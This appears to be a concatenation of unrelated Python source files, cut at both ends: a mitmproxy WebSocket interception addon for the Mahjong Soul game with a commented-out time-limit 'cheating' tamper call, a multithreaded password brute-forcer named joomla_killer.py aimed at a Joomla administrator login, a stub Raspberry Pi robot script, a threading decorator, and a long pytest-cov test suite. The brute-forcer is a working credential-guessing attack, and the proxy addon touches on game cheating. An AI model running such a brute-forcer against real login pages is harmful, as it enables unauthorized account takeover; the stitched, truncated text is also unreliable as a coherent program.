Called when a WebSocket message is received from the client or
server. The most recent message will be flow.messages[-1]. The
message is user-modifiable. Currently there are two types of
messages, corresponding to the BINARY and TEXT frame types.
"""
flow_msg = flow.messages[-1]
# This is cheating, extending the time limit to 7 seconds
#tamperUsetime(flow_msg)
#result = liqi.parse(flow_msg)
#print(result)
#print('-'*65)
packet = flow_msg.content
from_client = flow_msg.from_client
print("[" + ("Sended" if from_client else "Reveived") +
"] from '"+flow.id+"': decode the packet here: %r…" % packet)
def websocket_error(self, flow: mitmproxy.websocket.WebSocketFlow):
"""
A websocket connection has had an error.
"""
print("websocket_error, %r" % flow)
def websocket_end(self, flow: mitmproxy.websocket.WebSocketFlow):
"""
A websocket connection has ended.
"""
print('[end websocket]:',flow,flow.__dict__,dir(flow))
global activated_flows,messages_dict
activated_flows.remove(flow.id)
messages_dict.pop(flow.id)
addons = [
ClientWebSocket()
]
# RPC调用函数
def get_len() -> int:
global activated_flows,messages_dict
L=messages_dict[activated_flows[-1]]
return len(L)
def get_item(id: int):
global activated_flows,messages_dict
L=messages_dict[activated_flows[-1]]
return pickle.dumps(L[id])
def get_items(from_: int, to_: int):
global activated_flows,messages_dict
L=messages_dict[activated_flows[-1]]
return pickle.dumps(L[from_:to_:])
def RPC_init():
server = SimpleXMLRPCServer(('localhost', 37247))
server.register_function(get_len, "get_len")
server.register_function(get_item, "get_item")
server.register_function(get_items, "get_items")
print("RPC Server Listening on 127.0.0.1:37247 for Client.")
server.serve_forever()
RPC_server = threading.Thread(target=RPC_init)
RPC_server.start()
# open chrome and liqi
chrome_options = Options()
chrome_options.add_argument('--proxy-server=127.0.0.1:8080')
chrome_options.add_argument('--ignore-certificate-errors')
browser = webdriver.Chrome(chrome_options=chrome_options)
#browser.get('https://www.majsoul.com/1/')
if __name__=='__main__':
#回放websocket流量
replay_path=os.path.join(os.path.dirname(__file__), 'websocket_frames.pkl')
history_msg = pickle.load(open(replay_path, 'rb'))
activated_flows = ['fake_id']
messages_dict = {'fake_id':history_msg}
|
joomla_killer.py
|
import http.cookiejar
import queue
import threading
import urllib.error
import urllib.parse
import urllib.request
from abc import ABC
from html.parser import HTMLParser
# general settings
user_thread = 10
username = "admin"
wordlist_file = "INSERT-WORDLIST"
resume = None
# target specific settings
target_url = "http://192.168.1.3/administrator/index.php"
target_post = "http://192.168.1.3/administrator/index.php"
username_field = "username"
password_field = "passwd"
success_check = "Administration - Control Panel"
class BruteParser(HTMLParser, ABC):
def __init__(self):
HTMLParser.__init__(self)
self.tag_results = {}
def handle_starttag(self, tag, attrs):
if tag == "input":
tag_name = None
for name, value in attrs:
if name == "name":
tag_name = value
if tag_name:
self.tag_results[tag_name] = value
class Bruter(object):
def __init__(self, user, words_q):
self.username = user
self.password_q = words_q
self.found = False
print("Finished setting up for: %s" % user)
def run_bruteforce(self):
for i in range(user_thread):
t = threading.Thread(target=self.web_bruter)
t.start()
def web_bruter(self):
while not self.password_q.empty() and not self.found:
brute = self.password_q.get().rstrip()
jar = http.cookiejar.FileCookieJar("cookies")
opener = urllib.request.build_opener(
urllib.request.HTTPCookieProcessor(jar)
)
response = opener.open(target_url)
page = response.read()
print(
"Trying: %s : %s (%d left)"
% (self.username, brute, self.password_q.qsize())
)
# parse out the hidden fields
parser = BruteParser()
parser.feed(page)
post_tags = parser.tag_results
# add our username and password fields
post_tags[username_field] = self.username
post_tags[password_field] = brute
login_data = urllib.parse.urlencode(post_tags)
login_response = opener.open(target_post, login_data)
login_result = login_response.read()
if success_check in login_result:
self.found = True
print("[*] Bruteforce successful.")
print("[*] Username: %s" % username)
print("[*] Password: %s" % brute)
print("[*] Waiting for other threads to exit...")
def build_wordlist(wordlst_file):
# read in the word list
fd = open(wordlst_file, "r")
raw_words = [line.rstrip("\n") for line in fd]
fd.close()
found_resume = False
word_queue = queue.Queue()
for word in raw_words:
word = word.rstrip()
if resume is not None:
if found_resume:
word_queue.put(word)
else:
if word == resume:
found_resume = True
print("Resuming wordlist from: %s" % resume)
else:
word_queue.put(word)
return word_queue
words = build_wordlist(wordlist_file)
bruter_obj = Bruter(username, words)
bruter_obj.run_bruteforce()
|
maincode_raspberrypi.py
|
#Main Code: Automated Bridge Inspection - Raspberry Pi
#Group 1, ME588
# import packages here ####################################
# import different functions needed here ##########################
# FSM ##########################################################
# inputs:
# pan = camera servo1 angle readings (output from servo pid
# tilt = camera servo2 angle readings
# patch = pushing mechanism servo 3
# ts = timer switch that begins 75 sec timer
# rd = counter for the number of times entering row d
# us1 = Ultrasonic sensor distance reading (pi pin)
def fsm(self, pan, tilt, patch, ts, rd, us1, us2, us3, us4):
return (left_motor, right_motor, patching, state)
# leave this section at bottom
# Multiprocessing code that runs multiple processes ###################################################
# link to help explain https://pythonprogramming.net/multiprocessing-python-intermediate-python-tutorial/
if __name__ == '__main__':
for i in range(100):
p = multiprocessing.Process(target=fsm, args=())
p.start()
p.join()
|
decorators.py
|
from threading import Thread
def asynch(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
|
test_pytest_cov.py
|
import collections
import glob
import os
import platform
import re
import subprocess
import sys
from itertools import chain
import coverage
import py
import pytest
import virtualenv
import xdist
from fields import Namespace
from process_tests import TestProcess as _TestProcess
from process_tests import dump_on_error
from process_tests import wait_for_strings
import pytest_cov.plugin
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
coverage, platform # required for skipif mark on test_cov_min_from_coveragerc
max_worker_restart_0 = "--max-worker-restart=0"
SCRIPT = '''
import sys, helper
def pytest_generate_tests(metafunc):
for i in [10]:
metafunc.parametrize('p', range(i))
def test_foo(p):
x = True
helper.do_stuff() # get some coverage in some other completely different location
if sys.version_info[0] > 5:
assert False
'''
SCRIPT2 = '''
#
def test_bar():
x = True
assert x
'''
COVERAGERC_SOURCE = '''\
[run]
source = .
'''
SCRIPT_CHILD = '''
import sys
idx = int(sys.argv[1])
if idx == 0:
foo = "a" # previously there was a "pass" here but Python 3.5 optimizes it away.
if idx == 1:
foo = "b" # previously there was a "pass" here but Python 3.5 optimizes it away.
'''
SCRIPT_PARENT = '''
import os
import subprocess
import sys
def pytest_generate_tests(metafunc):
for i in [2]:
metafunc.parametrize('idx', range(i))
def test_foo(idx):
out, err = subprocess.Popen(
[sys.executable, os.path.join(os.path.dirname(__file__), 'child_script.py'), str(idx)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
# there is a issue in coverage.py with multiline statements at
# end of file: https://bitbucket.org/ned/coveragepy/issue/293
pass
'''
SCRIPT_PARENT_CHANGE_CWD = '''
import subprocess
import sys
import os
def pytest_generate_tests(metafunc):
for i in [2]:
metafunc.parametrize('idx', range(i))
def test_foo(idx):
os.mkdir("foobar")
os.chdir("foobar")
subprocess.check_call([
sys.executable,
os.path.join(os.path.dirname(__file__), 'child_script.py'),
str(idx)
])
# there is a issue in coverage.py with multiline statements at
# end of file: https://bitbucket.org/ned/coveragepy/issue/293
pass
'''
SCRIPT_PARENT_CHANGE_CWD_IMPORT_CHILD = '''
import subprocess
import sys
import os
def pytest_generate_tests(metafunc):
for i in [2]:
if metafunc.function is test_foo: metafunc.parametrize('idx', range(i))
def test_foo(idx):
os.mkdir("foobar")
os.chdir("foobar")
subprocess.check_call([
sys.executable,
'-c', 'import sys; sys.argv = ["", str(%s)]; import child_script' % idx
])
# there is a issue in coverage.py with multiline statements at
# end of file: https://bitbucket.org/ned/coveragepy/issue/293
pass
'''
SCRIPT_FUNCARG = '''
import coverage
def test_foo(cov):
assert isinstance(cov, coverage.Coverage)
'''
SCRIPT_FUNCARG_NOT_ACTIVE = '''
def test_foo(cov):
assert cov is None
'''
CHILD_SCRIPT_RESULT = '[56] * 100%'
PARENT_SCRIPT_RESULT = '9 * 100%'
DEST_DIR = 'cov_dest'
REPORT_NAME = 'cov.xml'
xdist_params = pytest.mark.parametrize('opts', [
'',
pytest.param('-n 1', marks=pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"'))
], ids=['nodist', 'xdist'])
@pytest.fixture(scope='session', autouse=True)
def adjust_sys_path():
"""Adjust PYTHONPATH during tests to make "helper" importable in SCRIPT."""
orig_path = os.environ.get('PYTHONPATH', None)
new_path = os.path.dirname(__file__)
if orig_path is not None:
new_path = os.pathsep.join([new_path, orig_path])
os.environ['PYTHONPATH'] = new_path
yield
if orig_path is None:
del os.environ['PYTHONPATH']
else:
os.environ['PYTHONPATH'] = orig_path
@pytest.fixture(params=[
('branch=true', '--cov-branch', '9 * 85%', '3 * 100%'),
('branch=true', '', '9 * 85%', '3 * 100%'),
('', '--cov-branch', '9 * 85%', '3 * 100%'),
('', '', '9 * 89%', '3 * 100%'),
], ids=['branch2x', 'branch1c', 'branch1a', 'nobranch'])
def prop(request):
return Namespace(
code=SCRIPT,
code2=SCRIPT2,
conf=request.param[0],
fullconf='[run]\n%s\n' % request.param[0],
prefixedfullconf='[coverage:run]\n%s\n' % request.param[0],
args=request.param[1].split(),
result=request.param[2],
result2=request.param[3],
)
def test_central(testdir, prop):
script = testdir.makepyfile(prop.code)
testdir.tmpdir.join('.coveragerc').write(prop.fullconf)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script,
*prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_central* %s *' % prop.result,
'*10 passed*'
])
assert result.ret == 0
def test_annotate(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=annotate',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Coverage annotated source written next to source',
'*10 passed*',
])
assert result.ret == 0
def test_annotate_output_dir(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=annotate:' + DEST_DIR,
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Coverage annotated source written to dir ' + DEST_DIR,
'*10 passed*',
])
dest_dir = testdir.tmpdir.join(DEST_DIR)
assert dest_dir.check(dir=True)
assert dest_dir.join(script.basename + ",cover").check()
assert result.ret == 0
def test_html(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=html',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Coverage HTML written to dir htmlcov',
'*10 passed*',
])
dest_dir = testdir.tmpdir.join('htmlcov')
assert dest_dir.check(dir=True)
assert dest_dir.join("index.html").check()
assert result.ret == 0
def test_html_output_dir(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=html:' + DEST_DIR,
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Coverage HTML written to dir ' + DEST_DIR,
'*10 passed*',
])
dest_dir = testdir.tmpdir.join(DEST_DIR)
assert dest_dir.check(dir=True)
assert dest_dir.join("index.html").check()
assert result.ret == 0
def test_term_report_does_not_interact_with_html_output(testdir):
script = testdir.makepyfile(test_funcarg=SCRIPT_FUNCARG)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing:skip-covered',
'--cov-report=html:' + DEST_DIR,
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Coverage HTML written to dir ' + DEST_DIR,
'*1 passed*',
])
dest_dir = testdir.tmpdir.join(DEST_DIR)
assert dest_dir.check(dir=True)
assert sorted(dest_dir.visit("**/*.html")) == [dest_dir.join("index.html"), dest_dir.join("test_funcarg_py.html")]
assert dest_dir.join("index.html").check()
assert result.ret == 0
def test_html_configured_output_dir(testdir):
script = testdir.makepyfile(SCRIPT)
testdir.tmpdir.join('.coveragerc').write("""
[html]
directory = somewhere
""")
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=html',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Coverage HTML written to dir somewhere',
'*10 passed*',
])
dest_dir = testdir.tmpdir.join('somewhere')
assert dest_dir.check(dir=True)
assert dest_dir.join("index.html").check()
assert result.ret == 0
def test_xml_output_dir(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=xml:' + REPORT_NAME,
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Coverage XML written to file ' + REPORT_NAME,
'*10 passed*',
])
assert testdir.tmpdir.join(REPORT_NAME).check()
assert result.ret == 0
def test_term_output_dir(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term:' + DEST_DIR,
script)
result.stderr.fnmatch_lines([
'*argument --cov-report: output specifier not supported for: "term:%s"*' % DEST_DIR,
])
assert result.ret != 0
def test_term_missing_output_dir(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing:' + DEST_DIR,
script)
result.stderr.fnmatch_lines([
'*argument --cov-report: output specifier not supported for: '
'"term-missing:%s"*' % DEST_DIR,
])
assert result.ret != 0
def test_cov_min_100(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--cov-fail-under=100',
script)
assert result.ret != 0
result.stdout.fnmatch_lines([
'FAIL Required test coverage of 100% not reached. Total coverage: *%'
])
def test_cov_min_100_passes_if_collectonly(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--cov-fail-under=100',
'--collect-only',
script)
assert result.ret == 0
def test_cov_min_50(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=html',
'--cov-report=xml',
'--cov-fail-under=50',
script)
assert result.ret == 0
result.stdout.fnmatch_lines([
'Required test coverage of 50% reached. Total coverage: *%'
])
def test_cov_min_float_value(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--cov-fail-under=88.88',
script)
assert result.ret == 0
result.stdout.fnmatch_lines([
'Required test coverage of 88.88% reached. Total coverage: 88.89%'
])
def test_cov_min_float_value_not_reached(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--cov-fail-under=88.89',
script)
assert result.ret == 1
result.stdout.fnmatch_lines([
'FAIL Required test coverage of 88.89% not reached. Total coverage: 88.89%'
])
def test_cov_min_no_report(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=',
'--cov-fail-under=50',
script)
assert result.ret == 0
result.stdout.fnmatch_lines([
'Required test coverage of 50% reached. Total coverage: *%'
])
def test_central_nonspecific(testdir, prop):
script = testdir.makepyfile(prop.code)
testdir.tmpdir.join('.coveragerc').write(prop.fullconf)
result = testdir.runpytest('-v',
'--cov',
'--cov-report=term-missing',
script, *prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_central_nonspecific* %s *' % prop.result,
'*10 passed*'
])
# multi-module coverage report
assert any(line.startswith('TOTAL ') for line in result.stdout.lines)
assert result.ret == 0
def test_cov_min_from_coveragerc(testdir):
script = testdir.makepyfile(SCRIPT)
testdir.tmpdir.join('.coveragerc').write("""
[report]
fail_under = 100
""")
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert result.ret != 0
def test_central_coveragerc(testdir, prop):
script = testdir.makepyfile(prop.code)
testdir.tmpdir.join('.coveragerc').write(COVERAGERC_SOURCE + prop.conf)
result = testdir.runpytest('-v',
'--cov',
'--cov-report=term-missing',
script, *prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_central_coveragerc* %s *' % prop.result,
'*10 passed*',
])
assert result.ret == 0
@xdist_params
def test_central_with_path_aliasing(testdir, monkeypatch, opts, prop):
mod1 = testdir.mkdir('src').join('mod.py')
mod1.write(SCRIPT)
mod2 = testdir.mkdir('aliased').join('mod.py')
mod2.write(SCRIPT)
script = testdir.makepyfile('''
from mod import *
''')
testdir.tmpdir.join('setup.cfg').write("""
[coverage:paths]
source =
src
aliased
[coverage:run]
source = mod
parallel = true
%s
""" % prop.conf)
monkeypatch.setitem(os.environ, 'PYTHONPATH', os.pathsep.join([os.environ.get('PYTHONPATH', ''), 'aliased']))
result = testdir.runpytest('-v', '-s',
'--cov',
'--cov-report=term-missing',
script, *opts.split()+prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'src[\\/]mod* %s *' % prop.result,
'*10 passed*',
])
assert result.ret == 0
@xdist_params
def test_borken_cwd(testdir, monkeypatch, opts):
testdir.makepyfile(mod='''
def foobar(a, b):
return a + b
''')
script = testdir.makepyfile('''
import os
import tempfile
import pytest
import mod
@pytest.fixture
def bad():
path = tempfile.mkdtemp('test_borken_cwd')
os.chdir(path)
yield
try:
os.rmdir(path)
except OSError:
pass
def test_foobar(bad):
assert mod.foobar(1, 2) == 3
''')
result = testdir.runpytest('-v', '-s',
'--cov=mod',
'--cov-branch',
script, *opts.split())
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'*mod* 100%',
'*1 passed*',
])
assert result.ret == 0
def test_subprocess_with_path_aliasing(testdir, monkeypatch):
src = testdir.mkdir('src')
src.join('parent_script.py').write(SCRIPT_PARENT)
src.join('child_script.py').write(SCRIPT_CHILD)
aliased = testdir.mkdir('aliased')
parent_script = aliased.join('parent_script.py')
parent_script.write(SCRIPT_PARENT)
aliased.join('child_script.py').write(SCRIPT_CHILD)
testdir.tmpdir.join('.coveragerc').write("""
[paths]
source =
src
aliased
[run]
source =
parent_script
child_script
parallel = true
""")
monkeypatch.setitem(os.environ, 'PYTHONPATH', os.pathsep.join([
os.environ.get('PYTHONPATH', ''), 'aliased']))
result = testdir.runpytest('-v',
'--cov',
'--cov-report=term-missing',
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'src[\\/]child_script* %s*' % CHILD_SCRIPT_RESULT,
'src[\\/]parent_script* %s*' % PARENT_SCRIPT_RESULT,
])
assert result.ret == 0
def test_show_missing_coveragerc(testdir, prop):
script = testdir.makepyfile(prop.code)
testdir.tmpdir.join('.coveragerc').write("""
[run]
source = .
%s
[report]
show_missing = true
""" % prop.conf)
result = testdir.runpytest('-v',
'--cov',
'--cov-report=term',
script, *prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Name * Stmts * Miss * Cover * Missing',
'test_show_missing_coveragerc* %s * 11*' % prop.result,
'*10 passed*',
])
assert result.ret == 0
def test_no_cov_on_fail(testdir):
script = testdir.makepyfile('''
def test_fail():
assert False
''')
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--no-cov-on-fail',
script)
assert 'coverage: platform' not in result.stdout.str()
result.stdout.fnmatch_lines(['*1 failed*'])
def test_no_cov(testdir, monkeypatch):
script = testdir.makepyfile(SCRIPT)
testdir.makeini("""
[pytest]
addopts=--no-cov
""")
result = testdir.runpytest('-vvv',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'-rw',
script)
result.stdout.fnmatch_lines_random([
'WARNING: Coverage disabled via --no-cov switch!',
'*Coverage disabled via --no-cov switch!',
])
def test_cov_and_failure_report_on_fail(testdir):
script = testdir.makepyfile(SCRIPT + '''
def test_fail(p):
assert False
''')
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-fail-under=100',
'--cov-report=html',
script)
result.stdout.fnmatch_lines_random([
'*10 failed*',
'*coverage: platform*',
'*FAIL Required test coverage of 100% not reached*',
'*assert False*',
])
@pytest.mark.skipif('sys.platform == "win32" or platform.python_implementation() == "PyPy"')
def test_dist_combine_racecondition(testdir):
script = testdir.makepyfile("""
import pytest
@pytest.mark.parametrize("foo", range(1000))
def test_foo(foo):
""" + "\n".join("""
if foo == %s:
assert True
""" % i for i in range(1000)))
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'-n', '5', '-s',
script)
result.stdout.fnmatch_lines([
'test_dist_combine_racecondition* 0 * 100%*',
'*1000 passed*'
])
for line in chain(result.stdout.lines, result.stderr.lines):
assert 'The following workers failed to return coverage data' not in line
assert 'INTERNALERROR' not in line
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_dist_collocated(testdir, prop):
script = testdir.makepyfile(prop.code)
testdir.tmpdir.join('.coveragerc').write(prop.fullconf)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--dist=load',
'--tx=2*popen',
max_worker_restart_0,
script, *prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_dist_collocated* %s *' % prop.result,
'*10 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_dist_not_collocated(testdir, prop):
script = testdir.makepyfile(prop.code)
dir1 = testdir.mkdir('dir1')
dir2 = testdir.mkdir('dir2')
testdir.tmpdir.join('.coveragerc').write('''
[run]
%s
[paths]
source =
.
dir1
dir2''' % prop.conf)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--dist=load',
'--tx=popen//chdir=%s' % dir1,
'--tx=popen//chdir=%s' % dir2,
'--rsyncdir=%s' % script.basename,
'--rsyncdir=.coveragerc',
max_worker_restart_0, '-s',
script, *prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_dist_not_collocated* %s *' % prop.result,
'*10 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_dist_not_collocated_coveragerc_source(testdir, prop):
script = testdir.makepyfile(prop.code)
dir1 = testdir.mkdir('dir1')
dir2 = testdir.mkdir('dir2')
testdir.tmpdir.join('.coveragerc').write('''
[run]
{}
source = {}
[paths]
source =
.
dir1
dir2'''.format(prop.conf, script.dirpath()))
result = testdir.runpytest('-v',
'--cov',
'--cov-report=term-missing',
'--dist=load',
'--tx=popen//chdir=%s' % dir1,
'--tx=popen//chdir=%s' % dir2,
'--rsyncdir=%s' % script.basename,
'--rsyncdir=.coveragerc',
max_worker_restart_0, '-s',
script, *prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_dist_not_collocated* %s *' % prop.result,
'*10 passed*'
])
assert result.ret == 0
def test_central_subprocess(testdir):
scripts = testdir.makepyfile(parent_script=SCRIPT_PARENT,
child_script=SCRIPT_CHILD)
parent_script = scripts.dirpath().join('parent_script.py')
result = testdir.runpytest('-v',
'--cov=%s' % scripts.dirpath(),
'--cov-report=term-missing',
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'child_script* %s*' % CHILD_SCRIPT_RESULT,
'parent_script* %s*' % PARENT_SCRIPT_RESULT,
])
assert result.ret == 0
def test_central_subprocess_change_cwd(testdir):
scripts = testdir.makepyfile(parent_script=SCRIPT_PARENT_CHANGE_CWD,
child_script=SCRIPT_CHILD)
parent_script = scripts.dirpath().join('parent_script.py')
testdir.makefile('', coveragerc="""
[run]
branch = true
parallel = true
""")
result = testdir.runpytest('-v', '-s',
'--cov=%s' % scripts.dirpath(),
'--cov-config=coveragerc',
'--cov-report=term-missing',
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'*child_script* %s*' % CHILD_SCRIPT_RESULT,
'*parent_script* 100%*',
])
assert result.ret == 0
def test_central_subprocess_change_cwd_with_pythonpath(testdir, monkeypatch):
stuff = testdir.mkdir('stuff')
parent_script = stuff.join('parent_script.py')
parent_script.write(SCRIPT_PARENT_CHANGE_CWD_IMPORT_CHILD)
stuff.join('child_script.py').write(SCRIPT_CHILD)
testdir.makefile('', coveragerc="""
[run]
parallel = true
""")
monkeypatch.setitem(os.environ, 'PYTHONPATH', str(stuff))
result = testdir.runpytest('-vv', '-s',
'--cov=child_script',
'--cov-config=coveragerc',
'--cov-report=term-missing',
'--cov-branch',
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'*child_script* %s*' % CHILD_SCRIPT_RESULT,
])
assert result.ret == 0
def test_central_subprocess_no_subscript(testdir):
script = testdir.makepyfile("""
import subprocess, sys
def test_foo():
subprocess.check_call([sys.executable, '-c', 'print("Hello World")'])
""")
testdir.makefile('', coveragerc="""
[run]
parallel = true
""")
result = testdir.runpytest('-v',
'--cov-config=coveragerc',
'--cov=%s' % script.dirpath(),
'--cov-branch',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_central_subprocess_no_subscript* * 3 * 0 * 100%*',
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_dist_subprocess_collocated(testdir):
scripts = testdir.makepyfile(parent_script=SCRIPT_PARENT,
child_script=SCRIPT_CHILD)
parent_script = scripts.dirpath().join('parent_script.py')
result = testdir.runpytest('-v',
'--cov=%s' % scripts.dirpath(),
'--cov-report=term-missing',
'--dist=load',
'--tx=2*popen',
max_worker_restart_0,
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'child_script* %s*' % CHILD_SCRIPT_RESULT,
'parent_script* %s*' % PARENT_SCRIPT_RESULT,
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_dist_subprocess_not_collocated(testdir, tmpdir):
scripts = testdir.makepyfile(parent_script=SCRIPT_PARENT,
child_script=SCRIPT_CHILD)
parent_script = scripts.dirpath().join('parent_script.py')
child_script = scripts.dirpath().join('child_script.py')
dir1 = tmpdir.mkdir('dir1')
dir2 = tmpdir.mkdir('dir2')
testdir.tmpdir.join('.coveragerc').write('''
[paths]
source =
%s
*/dir1
*/dir2
''' % scripts.dirpath())
result = testdir.runpytest('-v',
'--cov=%s' % scripts.dirpath(),
'--dist=load',
'--tx=popen//chdir=%s' % dir1,
'--tx=popen//chdir=%s' % dir2,
'--rsyncdir=%s' % child_script,
'--rsyncdir=%s' % parent_script,
'--rsyncdir=.coveragerc',
max_worker_restart_0,
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'child_script* %s*' % CHILD_SCRIPT_RESULT,
'parent_script* %s*' % PARENT_SCRIPT_RESULT,
])
assert result.ret == 0
def test_invalid_coverage_source(testdir):
script = testdir.makepyfile(SCRIPT)
testdir.makeini("""
[pytest]
console_output_style=classic
""")
result = testdir.runpytest('-v',
'--cov=non_existent_module',
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*10 passed*'
])
result.stderr.fnmatch_lines([
'Coverage.py warning: No data was collected.*'
])
result.stdout.fnmatch_lines([
'*Failed to generate report: No data to report.',
])
assert result.ret == 0
matching_lines = [line for line in result.outlines if '%' in line]
assert not matching_lines
@pytest.mark.skipif("'dev' in pytest.__version__")
@pytest.mark.skipif('sys.platform == "win32" and platform.python_implementation() == "PyPy"')
def test_dist_missing_data(testdir):
"""Test failure when using a worker without pytest-cov installed."""
venv_path = os.path.join(str(testdir.tmpdir), 'venv')
virtualenv.cli_run([venv_path])
if sys.platform == 'win32':
if platform.python_implementation() == "PyPy":
exe = os.path.join(venv_path, 'bin', 'python.exe')
else:
exe = os.path.join(venv_path, 'Scripts', 'python.exe')
else:
exe = os.path.join(venv_path, 'bin', 'python')
subprocess.check_call([
exe,
'-mpip',
'install',
'py==%s' % py.__version__,
'pytest==%s' % pytest.__version__,
'pytest_xdist==%s' % xdist.__version__
])
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--assert=plain',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--dist=load',
'--tx=popen//python=%s' % exe,
max_worker_restart_0,
script)
result.stdout.fnmatch_lines([
'The following workers failed to return coverage data, ensure that pytest-cov is installed on these workers.'
])
def test_funcarg(testdir):
script = testdir.makepyfile(SCRIPT_FUNCARG)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_funcarg* 3 * 100%*',
'*1 passed*'
])
assert result.ret == 0
def test_funcarg_not_active(testdir):
script = testdir.makepyfile(SCRIPT_FUNCARG_NOT_ACTIVE)
result = testdir.runpytest('-v',
script)
result.stdout.fnmatch_lines([
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif("sys.version_info[0] < 3", reason="no context manager api on Python 2")
@pytest.mark.skipif('sys.platform == "win32"', reason="multiprocessing support is broken on Windows")
@pytest.mark.skipif('platform.python_implementation() == "PyPy"', reason="often deadlocks on PyPy")
@pytest.mark.skipif('sys.version_info[:2] >= (3, 8)', reason="deadlocks on Python 3.8+, see: https://bugs.python.org/issue38227")
def test_multiprocessing_pool(testdir):
pytest.importorskip('multiprocessing.util')
script = testdir.makepyfile('''
import multiprocessing
def target_fn(a):
%sse: # pragma: nocover
return None
def test_run_target():
from pytest_cov.embed import cleanup_on_sigterm
cleanup_on_sigterm()
for i in range(33):
with multiprocessing.Pool(3) as p:
p.map(target_fn, [i * 3 + j for j in range(3)])
p.join()
''' % ''.join('''if a == %r:
return a
el''' % i for i in range(99)))
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
